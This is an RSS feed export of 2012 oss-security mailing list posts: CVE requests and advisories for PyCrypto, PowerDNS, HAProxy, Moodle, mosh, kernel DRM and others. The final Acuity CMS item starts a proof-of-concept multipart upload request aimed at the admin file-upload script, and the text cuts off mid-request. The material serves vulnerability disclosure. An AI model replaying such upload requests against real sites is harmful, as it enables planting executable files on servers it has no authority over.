<?xml version="1.0" encoding="UTF-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:syn="http://purl.org/rss/1.0/modules/syndication/" xmlns:admin="http://webns.net/mvcb/">
  <channel rdf:about="http://blog.gmane.org/gmane.comp.security.oss.general">
    <title>gmane.comp.security.oss.general</title>
    <link>http://blog.gmane.org/gmane.comp.security.oss.general</link>
    <description/>
    <syn:updatePeriod>hourly</syn:updatePeriod>
    <syn:updateFrequency>1</syn:updateFrequency>
    <syn:updateBase>1901-01-01T00:00+00:00</syn:updateBase>
    <items>
      <rdf:Seq>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7763"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7761"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7748"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7740"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7738"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7737"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7736"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7735"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7732"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7731"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7730"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7721"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7716"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7715"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7713"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7712"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7711"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7710"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7708"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.security.oss.general/7704"/>
      </rdf:Seq>
    </items>
    <image rdf:resource="http://gmane.org/img/gmane-25t.png"/>
    <textinput rdf:resource=""/>
  </channel>
  <image rdf:about="http://gmane.org/img/gmane-25t.png">
    <title>Gmane</title>
    <url>http://gmane.org/img/gmane-25t.png</url>
    <link>http://gmane.org</link>
  </image>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7763">
    <title>CVE-2011-2906 should have been rejected (kernel non-security issue)</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7763</link>
    <description>&lt;pre&gt;Hi, Steve.  Just a friendly heads-up on what came through CVENEW today:


This should be rejected as per the message two responses after the first
reference above:

http://www.openwall.com/lists/oss-security/2011/08/10/2

where Eugene says, based on the "this isn't a security flaw" message
from Dan Rosenberg.

Can you add a "REJECT" or "DISPUTED" note or whatever?  This probably
should have never been written up.

Thanks.

&lt;/pre&gt;</description>
    <dc:creator>Vincent Danen</dc:creator>
    <dc:date>2012-05-25T04:11:09</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7761">
    <title>CVE-2012-2417 - PyCrypto &lt;= 2.5 insecure ElGamal key generation</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7761</link>
    <description>&lt;pre&gt;CVE-2012-2417 https://bugs.launchpad.net/pycrypto/+bug/985164

PyCrypto (also known as python-crypto) versions 2.5 and earlier implement 
incorrect ElGamal key generation.  The bug has been fixed in PyCrypto 
2.6, which was released this morning.  Details below:

     In the ElGamal schemes (for both encryption and signatures), g is
     supposed to be the generator of the entire Z^*_p group. However, in
     PyCrypto 2.5 and earlier, g is more simply the generator of a random
     sub-group of Z^*_p.

     The result is that the signature space (when the key is used for
     signing) or the public key space (when the key is used for encryption)
     may be greatly reduced from its expected size of log(p) bits, possibly
     down to 1 bit (the worst case if the order of g is 2).

     While it has not been confirmed, it has also been suggested that an
     attacker might be able to use this fact to determine the private key.

Anyone using ElGamal keys should generate new keys as soon as practical.

Any additional information about this bug will be tracked at the above URL.

&lt;/pre&gt;</description>
    <dc:creator>Dwayne C. Litzenberger</dc:creator>
    <dc:date>2012-05-24T23:30:54</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7748">
    <title>CVE Request: powerdns does not clear supplementary groups</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7748</link>
    <description>&lt;pre&gt;Powerdns does not drop/clear supplementary groups in its dropPrivs
routine where the intent is to drop privileges.

The relevant code can be found in pdns/unix_utility.cc /
pdns-recursor-3.3/unix_utility.cc [0].

Can a CVE id be assigned for this issue?


[0]
pdns/unix_utility.cc / pdns-recursor-3.3/unix_utility.cc
// Drops the program's privileges.
void Utility::dropPrivs( int uid, int gid )
{
 if(gid) {
   if(setgid(gid)&amp;lt;0) {
     theL()&amp;lt;&amp;lt;Logger::Critical&amp;lt;&amp;lt;"Unable to set effective group id to "&amp;lt;&amp;lt;gid&amp;lt;&amp;lt;": "&amp;lt;&amp;lt;stringerror()&amp;lt;&amp;lt;endl;
     exit(1);
   }
   else
     theL()&amp;lt;&amp;lt;Logger::Info&amp;lt;&amp;lt;"Set effective group id to "&amp;lt;&amp;lt;gid&amp;lt;&amp;lt;endl;

 }

 if(uid) {
   if(setuid(uid)&amp;lt;0) {
     theL()&amp;lt;&amp;lt;Logger::Critical&amp;lt;&amp;lt;"Unable to set effective user id to "&amp;lt;&amp;lt;uid&amp;lt;&amp;lt;":  "&amp;lt;&amp;lt;stringerror()&amp;lt;&amp;lt;endl;
     exit(1);
   }
   else
     theL()&amp;lt;&amp;lt;Logger::Info&amp;lt;&amp;lt;"Set effective user id to "&amp;lt;&amp;lt;uid&amp;lt;&amp;lt;endl;
 }
}

&lt;/pre&gt;</description>
    <dc:creator>David Black</dc:creator>
    <dc:date>2012-05-24T16:20:59</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7740">
    <title>CVE request: haproxy trash buffer overflow flaw</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7740</link>
    <description>&lt;pre&gt;Could a CVE be assigned to this flaw please?

A flaw was reported in HAProxy where, due to a boundary error when
copying data into the trash buffer, an external attacker could cause a
buffer overflow.  Exploiting this flaw could lead to the execution of
arbitrary code, however it requires non-default settings for the
global.tune.bufsize configuration option (must be set to a value greater
than the default), and also that header rewriting is enabled (via, for
example, the reqrep or rsprep directives).

This flaw is reported against 1.4.20, prior versions may also be
affected.  This has been fixed upstream in version 1.4.21 and in git.

References:

https://secunia.com/advisories/49261/
http://haproxy.1wt.eu/download/1.4/src/CHANGELOG
http://haproxy.1wt.eu/git?p=haproxy-1.4.git;a=commit;h=30297cb17147a8d339eb160226bcc08c91d9530b
https://bugzilla.redhat.com/show_bug.cgi?id=824542

&lt;/pre&gt;</description>
    <dc:creator>Vincent Danen</dc:creator>
    <dc:date>2012-05-23T17:37:23</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7738">
    <title>CVE Request -- wireshark: wnpa-sec-2012-08, wnpa-sec-2012-09, wnpa-sec-2012-10</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7738</link>
    <description>&lt;pre&gt;Hello Kurt, Steve, vendors,

   the following recent Wireshark upstream advisories:

A) http://www.wireshark.org/security/wnpa-sec-2012-08.html

    References (upstream bugs and Red Hat bugzilla entry):
    [1] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6805 (802.11)
    [2] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7118 (802.3)
    [3] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7119 (ANSIMAP)
    [4] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7120 (ASF)
    [5] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7121 (BACAPP)
    [6] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7122 (HCIEVT)
    [7] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7124 (LTP)
    [8] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7125 (R3)
    [9] https://bugzilla.redhat.com/show_bug.cgi?id=824411

B) http://www.wireshark.org/security/wnpa-sec-2012-09.html

    References:
    [1] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7138
    [2] https://bugzilla.redhat.com/show_bug.cgi?id=824413

C) http://www.wireshark.org/security/wnpa-sec-2012-10.html

    References:
    [1] https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7221
    [2] https://bugzilla.redhat.com/show_bug.cgi?id=824419

don't seem to have CVE identifiers yet.

Could you allocate three of them?

Thank you &amp;amp;&amp;amp; Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team

&lt;/pre&gt;</description>
    <dc:creator>Jan Lieskovsky</dc:creator>
    <dc:date>2012-05-23T12:38:47</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7737">
    <title>CVE request: Multiple vulnerabilities in LogAnalyzer</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7737</link>
    <description>&lt;pre&gt;Hello,
Can I get a CVE identifier for this issue:

http://www.codseq.it/advisories/multiple_vulnerabilities_in_loganalyzer

Here is the changelog:

http://loganalyzer.adiscon.com/news/loganalyzer-v3-4-3-v3-stable-released

Thanks,



Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin-4Iyl5xPYX6ReoWH0uzbU5w&amp;lt; at &amp;gt;public.gmane.org


&lt;/pre&gt;</description>
    <dc:creator>Filippo Cavallarin</dc:creator>
    <dc:date>2012-05-23T12:21:15</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7736">
    <title>CVE request: Multiple vulnerabilities in LogAnalyzer</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7736</link>
    <description>&lt;pre&gt;Hello,
Can I get a CVE identifier for this issue:

http://www.codseq.it/advisories/multiple_vulnerabilities_in_loganalyzer

Here is the changelog

http://loganalyzer.adiscon.com/news/loganalyzer-v3-4-3-v3-stable-released

Thanks,

Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin-4Iyl5xPYX6ReoWH0uzbU5w&amp;lt; at &amp;gt;public.gmane.org


&lt;/pre&gt;</description>
    <dc:creator>Filippo Cavallarin</dc:creator>
    <dc:date>2012-05-23T12:13:04</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7735">
    <title>CVE Request -- kernel: huge pages: memory leak on mmap failure</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7735</link>
    <description>&lt;pre&gt;Description of problem:
When called for anonymous (non-shared) mappings, hugetlb_reserve_pages()
does a resv_map_alloc(). It depends on code in hugetlbfs's
vm_ops-&amp;gt;close() to release that allocation.

However, in the mmap() failure path, we do a plain unmap_region()
without the remove_vma() which actually calls vm_ops-&amp;gt;close(). 

An unprivileged local user could use this flaw to crash the system.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=824345
http://www.spinics.net/lists/linux-mm/msg34763.html

Proposed upstream fix:
https://lkml.org/lkml/2012/5/21/385

Thanks,
&lt;/pre&gt;</description>
    <dc:creator>Petr Matousek</dc:creator>
    <dc:date>2012-05-23T10:35:12</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7732">
    <title>CVE request: cobbler command injection</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7732</link>
    <description>&lt;pre&gt;It was reported that it was possible to perform command injection
through the cobbler xmlrpc api[0][1]. This issue was fixed in the git
commit found at [2].
Can a CVE be assigned to this issue?


[0] https://bugs.launchpad.net/ubuntu/+source/cobbler/+bug/978999
[1] https://github.com/cobbler/cobbler/issues/141
[2] https://github.com/cobbler/cobbler/commit/6d9167e5da44eca56bdf42b5776097a6779aaadf

&lt;/pre&gt;</description>
    <dc:creator>David Black</dc:creator>
    <dc:date>2012-05-23T08:39:10</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7731">
    <title>CVE request(?): hostapd: improper file permissions of hostapd's config leaks credentials</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7731</link>
    <description>&lt;pre&gt;Hi Kurt, 
Hi vendors,

not too critical in my opinion, but I think still worth to be at least 
mentioned briefly as other distros such as Fedora 16 were affected too:

https://bugzilla.novell.com/show_bug.cgi?id=740964

I'm not sure whether this issue should get a CVE, but in the past similar 
vulnerabilities got a CVE (e.g. CVE-2012-0863).

Thanks,
Matthias

&lt;/pre&gt;</description>
    <dc:creator>Matthias Weckbecker</dc:creator>
    <dc:date>2012-05-23T08:21:25</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7730">
    <title>Moodle security notifications public</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7730</link>
    <description>&lt;pre&gt;The following security notifications have now been made public. Thanks 
to OSS members for their cooperation.

=======================================================================
MSA-12-0024: Hidden information access issue

Topic:             Data protection issue / Information disclosure by
                    "Settings" -&amp;gt;  "Users" -&amp;gt;  "Enrolled users"
Severity/Risk:     Minor
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+
Reported by:       Andreas Grupp
Issue no.:         MDL-31923
CVE Identifier:    CVE-2012-2353
Changes (master):  http://git.moodle.org/gw?p=moodle.git&amp;amp;a=search&amp;amp;h=HEAD&amp;amp;st=commit&amp;amp;s=MDL-31923
Description:
Teachers without appropriate permissions were able to see user access
information.

=======================================================================
MSA-12-0025: Personal communication access issue

Topic:             "Recent conversations" allows anyone to see anyone
                    else's messages
Severity/Risk:     Serious
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+
Reported by:       Juan Aburto
Issue no.:         MDL-31834
CVE Identifier:    CVE-2012-2354
Changes (master):  http://git.moodle.org/gw?p=moodle.git;a=commit;h=48e03792ca8faa2d781f9ef74606f3b3f0d3baec
Description:
By manipulating URL parameters, users were able to see others'
messages.

=======================================================================
MSA-12-0026: Quiz capability issue

Topic:             When you add a question to the quiz, it does not
                    check the question:use... capability.
Severity/Risk:     Minor
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+
Reported by:       Tim Hunt
Issue no.:         MDL-32240
CVE Identifier:    CVE-2012-2355
Changes (master):  http://git.moodle.org/gw?p=moodle.git&amp;amp;a=search&amp;amp;h=HEAD&amp;amp;st=commit&amp;amp;s=MDL-32240
Description:
Capabilities were not being correctly checked when adding questions
to a quiz.

=======================================================================
MSA-12-0027: Question bank capability issues

Topic:             Various problems with permissions checks in the
                    question bank
Severity/Risk:     Minor
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+
Reported by:       Tim Hunt
Issue no.:         MDL-32239
CVE Identifier:    CVE-2012-2356
Changes (master):  http://git.moodle.org/gw?p=moodle.git&amp;amp;a=search&amp;amp;h=HEAD&amp;amp;st=commit&amp;amp;s=MDL-32239
Description:
Capabilities were not being correctly checked when working in the
question bank. Question authorship was not being checked. Users were
shown UI elements when they did not have permission to use them.
User permissions were not correctly checked when saving a question.

=======================================================================
MSA-12-0028: Insecure authentication issue

Topic:             CAS Multi-Authentication Does Not Use HTTPS Login
Severity/Risk:     Minor
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+
Reported by:       Chris Follin
Workaround:        Avoid CAS authentication
Issue no.:         MDL-32492
CVE Identifier:    CVE-2012-2357
Changes (master):  http://git.moodle.org/gw?p=moodle.git;a=commit;h=895e76ea51c462c18ad66e0761ad76cd26a63ecf
Description:
A page in the CAS Authentication process was using an insecure HTTP
URL that, apart from being insecure, sent the user in circles.

=======================================================================
MSA-12-0029: Information editing access issue

Topic:             Students can edit database entries in read only mode
Severity/Risk:     Minor
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+
Reported by:       Amanda Doughty
Issue no.:         MDL-31811
CVE Identifier:    CVE-2012-2358
Changes (master):  http://git.moodle.org/gw?p=moodle.git&amp;amp;a=search&amp;amp;h=HEAD&amp;amp;st=commit&amp;amp;s=MDL-31811
Description:
Students were able to edit pre-existing Database activity entries
after the activity had entered a read-only period.

=======================================================================
MSA-12-0030: Capability manipulation issue

Topic:             Non-editor teacher can exceed teacher permissions: example, backup:userinfo
Severity/Risk:     Serious
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+
Reported by:       Jozas Nhial
Issue no.:         MDL-32030
CVE Identifier:    CVE-2012-2359
Changes (master):  http://git.moodle.org/gw?p=moodle.git;a=commit;h=0f75e1e6272db0303abc8e27362e5c3a1344b82f
Description:
Non-editing teachers were able to redefine their capabilities to
achieve actions they would not normally be able to achieve.

=======================================================================
MSA-12-0031: Cross-site scripting vulnerability in Wiki

Topic:             Injection and XSS vulnerability in wiki through
                    insufficient validation
Severity/Risk:     Serious
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+
Reported by:       Sam Hemelryk
Issue no.:         MDL-32018
CVE Identifier:    CVE-2012-2360
Changes (master):  http://git.moodle.org/gw?p=moodle.git&amp;amp;a=search&amp;amp;h=HEAD&amp;amp;st=commit&amp;amp;s=MDL-32018
Description:
It was possible to inject unfiltered HTML into a wiki page title.

=======================================================================
MSA-12-0032: Cross-site scripting vulnerability in Web services

Topic:             XSS in /admin/webservice/service.php
Severity/Risk:     Serious
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+
Reported by:       Dan Poltawski
Workaround:        Avoid Web services
Issue no.:         MDL-31694
CVE Identifier:    CVE-2012-2361
Changes (master):  http://git.moodle.org/gw?p=moodle.git&amp;amp;a=search&amp;amp;h=HEAD&amp;amp;st=commit&amp;amp;s=MDL-31694
Description:
The name parameter, sent to the Web service script service.php, was
not being filtered correctly.

=======================================================================
MSA-12-0033: Cross-site scripting vulnerability in Blog

Topic:             XSS bug in blog/index.php in IE
Severity/Risk:     Serious
Versions affected: 1.9 to 1.9.17+
Reported by:       Simon Coggins
Issue no.:         MDL-31745
CVE Identifier:    CVE-2012-2362
Changes (1.9):     http://git.moodle.org/gw?p=moodle.git;a=commit;h=038131c8b5614f18c14d964dc53b6960ae6c30d8
Description:
Parameters sent to the Blog module were not sufficiently filtered.
This allowed the potential for cross-site scripting in IE.

=======================================================================
MSA-12-0034: Potential SQL injection issue

Topic:             Stored SQL Injection in calendar
Severity/Risk:     Serious
Versions affected: 1.9 to 1.9.17+
Reported by:       Simon Coggins
Issue no.:         MDL-31746
CVE Identifier:    CVE-2012-2363
Changes (1.9):     http://git.moodle.org/gw?p=moodle.git&amp;amp;a=search&amp;amp;h=refs%2Fheads%2FMOODLE_19_STABLE&amp;amp;st=commit&amp;amp;s=MDL-31746
Description:
It was possible to include unfiltered information when adding a
calendar event that was stored in the database.

=======================================================================
MSA-12-0035: Cross-site scripting vulnerability in "download all"

Topic:             Content-Type is TEXT/HTML for zip Download instead
                    of application/x-zip-compressed or forced download
Severity/Risk:     Minor
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+
Reported by:       Asaf Ohaion
Workaround:        Avoid "download all" feature in Assignment
Issue no.:         MDL-31558
CVE Identifier:    CVE-2012-2364
Changes (master):  http://git.moodle.org/gw?p=moodle.git;a=commit;h=ce4126c7a9e07dd0514f7ac297b5e60cad0b8d20
Description:
An incorrect mimetype was being reported for zipped assignment
submissions, causing some browsers to render the response. The fix
for this issue also prevents incorrect use of file sending functions
by third-party modules.

=======================================================================
MSA-12-0036: Cross-site scripting vulnerability in category identifier

Topic:             XSS in /cohort/edit.php (POST parameter: idnumber)
Severity/Risk:     Serious
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+
Reported by:       Dan Poltawski
Issue no.:         MDL-31691
CVE Identifier:    CVE-2012-2365
Changes (master):  http://git.moodle.org/gw?p=moodle.git&amp;amp;a=search&amp;amp;h=HEAD&amp;amp;st=commit&amp;amp;s=MDL-31691
Description:
The idnumber field, an arbitrary unique identifier for a category,
was able to be entered without being filtered.

=======================================================================
MSA-12-0037: Write access issue in Database activity module

Topic:             It's possible for any user to overwrite site wide
                    database presets
Severity/Risk:     Minor
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+
Reported by:       Dan Poltawski
Issue no.:         MDL-31763
CVE Identifier:    CVE-2012-2366
Changes (master):  http://git.moodle.org/gw?p=moodle.git&amp;amp;a=search&amp;amp;h=HEAD&amp;amp;st=commit&amp;amp;s=MDL-31763
Description:
Users were able to overwrite site-wide Database activity presets
created by other users.

=======================================================================
MSA-12-0038: Calendar event write permission issue

Topic:             Calendar New Entry still shows and works for roles
                    preventing calendar entry
Severity/Risk:     Minor
Versions affected: 2.2 to 2.2.2+, 2.1 to 2.1.5+, 2.0 to 2.0.8+, 1.9 to
                    1.9.17+
Reported by:       Martin Huntley
Issue no.:         MDL-18335
CVE Identifier:    CVE-2012-2367
Changes (master):  http://git.moodle.org/gw?p=moodle.git&amp;amp;a=search&amp;amp;h=HEAD&amp;amp;st=commit&amp;amp;s=MDL-18335
Description:
Users without appropriate permissions were able to access the new
calendar entry page and create a calendar entry.



&lt;/pre&gt;</description>
    <dc:creator>Michael de Raadt</dc:creator>
    <dc:date>2012-05-23T00:11:52</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7721">
    <title>CVE Request -- mosh (and probably vte too): mosh server DoS (long loop) due to improper parsing of terminal parameters in terminal dispatcher</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7721</link>
    <description>&lt;pre&gt;Hello Kurt, Steve, vendors,

   based on:
   [1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673871
   [2] https://github.com/keithw/mosh/issues/271

A) Mosh issue:
==============
A denial of service flaw was found in the way mosh, a remote terminal application, performed 
processing of parameters that have been passed to the terminal in the terminal dispatcher class 
(previously there was no limit for the count of parameters, which were allowed to be passed to the 
dispatcher). A remote attacker could use this flaw to cause a denial of service (mosh server to 
enter long for loop when trying to process the parameters) via specially-crafted escape sequence string.

Upstream ticket:
[3] https://github.com/keithw/mosh/issues/271

Relevant upstream patch:
[4] https://github.com/keithw/mosh/commit/9791768705528e911bfca6c4d8aa88139035060e

References:
[5] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673871
[6] https://bugzilla.redhat.com/show_bug.cgi?id=823943

Could you allocate a CVE id for this? (issue confirmed by mosh upstream)

B) vte issue:
=============
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673871#5

there is a similar issue in vte too (Gnome bug private for now):
https://bugzilla.gnome.org/show_bug.cgi?id=676090

Cc-ed Behdad Esfahbod on this post to clarify, what are the upstream plans
regarding this report in vte and if the CVE id has been already assigned for
it.

Thank you &amp;amp;&amp;amp; Regards, Jan.
--
Jan iankko Lieskovsky / Red Hat Security Response Team

&lt;/pre&gt;</description>
    <dc:creator>Jan Lieskovsky</dc:creator>
    <dc:date>2012-05-22T13:53:30</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7716">
    <title>CVE request: Serendipity before 1.6.2 SQL Injection</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7716</link>
    <description>&lt;pre&gt;Upstream:
http://blog.s9y.org/archives/241-Serendipity-1.6.2-released.html
Advisory:
https://www.htbridge.com/advisory/HTB23092

Upstream description of the issue:
"The error here is that input is not properly validated and can be used
(when magic_quotes_gpc is off) to inject SQL code to a SQL query; since
our DB layer does not execute multiple statements, and the involved SQL
query is not used to produce output code, we regard the impact as low.
Nevertheless, please upgrade your installation."

Please assign CVE.

&lt;/pre&gt;</description>
    <dc:creator>Hanno Böck</dc:creator>
    <dc:date>2012-05-22T09:05:02</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7715">
    <title>CVE-2011-3102 / libxml2</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7715</link>
    <description>&lt;pre&gt;Hi,
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3102 points to
http://code.google.com/p/chromium/issues/detail?id=125462, which is
a 404.

http://googlechromereleases.blogspot.de/2012/05/stable-channel-update.html
references Jueri Aedla for the credits. I suppose this is related to this
libxml2 upstream commit:
http://git.gnome.org/browse/libxml2/commit/?id=d8e1faeaa99c7a7c07af01c1c72de352eb590a3e

Can anyone of the involved parties at Chrome and Red Hat please confirm?

Cheers,
        Moritz

&lt;/pre&gt;</description>
    <dc:creator>Moritz Muehlenhoff</dc:creator>
    <dc:date>2012-05-21T20:22:42</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7713">
    <title>CVE Request: some drm overflow checks</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7713</link>
    <description>&lt;pre&gt;Hi,

spotted in xorl's blog, who spotted it in the kernel stable changelog:
https://xorl.wordpress.com/2012/05/17/linux-kernel-drm-intel-i915-multiple-ioctl-integer-overflows/

It has two issues:

1. overflow of cliprect kmalloc as args-&amp;gt;num_cliprects is not bounded
  and passed in via a user ioctl.

  Fixed via ed8cd3b2cd61004cab85380c52b1817aca1ca49b in mainline:
  commit ed8cd3b2cd61004cab85380c52b1817aca1ca49b
  Author: Xi Wang &amp;lt;xi.wang-Re5JQEeQqe8AvxtiuMwx3w&amp;lt; at &amp;gt;public.gmane.org&amp;gt;
  Date:   Mon Apr 23 04:06:41 2012 -0400

    drm/i915: fix integer overflow in i915_gem_execbuffer2()

    On 32-bit systems, a large args-&amp;gt;buffer_count from userspace via ioctl
    may overflow the allocation size, leading to out-of-bounds access.

    This vulnerability was introduced in commit 8408c282 ("drm/i915:
    First try a normal large kmalloc for the temporary exec buffers").


  8408c282 was added Feb 21 2011, and seemingly added during 2.6.38 development.


2. same file, overflow in args-&amp;gt;buffer_count.

   Fix is in mainline 44afb3a04391a74309d16180d1e4f8386fdfa745

   commit 44afb3a04391a74309d16180d1e4f8386fdfa745
   Author: Xi Wang &amp;lt;xi.wang-Re5JQEeQqe8AvxtiuMwx3w&amp;lt; at &amp;gt;public.gmane.org&amp;gt;
   Date:   Mon Apr 23 04:06:42 2012 -0400

    drm/i915: fix integer overflow in i915_gem_do_execbuffer()

    On 32-bit systems, a large args-&amp;gt;num_cliprects from userspace via ioctl
    may overflow the allocation size, leading to out-of-bounds access.

    This vulnerability was introduced in commit 432e58ed ("drm/i915: Avoid
    allocation for execbuffer object list").


   432e58ed was added during 2.6.37 development.


I think it needs 2 CVEs, due to the different kernel versions introducing it.

Ciao, Marcus

&lt;/pre&gt;</description>
    <dc:creator>Marcus Meissner</dc:creator>
    <dc:date>2012-05-21T06:38:31</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7712">
    <title>CVE request: PHP Phar - arbitrary code execution</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7712</link>
    <description>&lt;pre&gt;Hi,
Can anyone assign a CVE id for the following PHP's phar extension
integer overflow vulnerability? (Secunia SA44335)

Private report: https://bugs.php.net/bug.php?id=61065

Discovered by: Alexander Gavrun

Original Advisory:
http://0x1byte.blogspot.com/2011/04/php-phar-extension-heap-overflow.html

&lt;/pre&gt;</description>
    <dc:creator>Felipe Pena</dc:creator>
    <dc:date>2012-05-20T18:09:06</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.security.oss.general/7711">
    <title>Acuity CMS 2.6.x &lt;= Arbitrary File Upload</title>
    <link>http://comments.gmane.org/gmane.comp.security.oss.general/7711</link>
    <description>&lt;pre&gt;1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.


2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.


3. VULNERABILITY DESCRIPTION

Acuity CMS 2.6.x (ASP-based) versions contain a flaw that may allow an
attacker to upload .asp/.aspx files without restrictions, which will
execute ASP(.Net) codes. The issue is due to the script,
/admin/file_manager/file_upload_submit.asp , not properly sanitizing
'file1', 'file2', 'file3', 'fileX' parameters.


4. VERSIONS AFFECTED

Tested with version 2.6.2.


5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX

-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="path"

/images
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootpath"

/
-----------------------------6dc3a236402e2
Content-Disposition: form-data; name="rootdisplay"

http://localhost/
-----------------------------6dc3a236402e2
